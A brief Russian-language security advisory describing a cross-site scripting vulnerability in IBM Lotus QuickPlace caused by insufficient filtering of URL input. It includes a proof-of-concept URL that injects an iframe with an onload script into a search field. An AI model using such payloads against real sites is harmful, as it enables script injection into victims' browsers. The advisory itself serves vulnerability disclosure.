Программа: IBM Lotus QuickPlace

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в URL запросе. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://website/QuickPlace/leg/Main.nsf/h_Toc/$new/?EditDocument&Form=h_RemoteUI& PreSetFields= h_EditAction;h_New,h_SetReadScene;h_StdPageRead,h_SetEditScene; h_RemoteSearchResults, h_ReturnToPage;B4F8E49FCF2698BE862573F100705440, h_SetRemote; 1,h_SearchString;<iframe/ /onload=alert(/XSSByNirG/)> </iframe,h_SearchAuthor; ,h_SearchDate;,h_SearchDateTypeString;,h_SearchOrder; ,h_SearchCount;15,h_SearchStart;0,h_SetErrorScene; h_RemoteError, h_SetEditCurrentScene;h_RemoteSearchResults,h_SetQuickBrowse; 1,h_SearchFolderScope;, h_SearchRoomScope;,h_SearchType;



Оставить мнение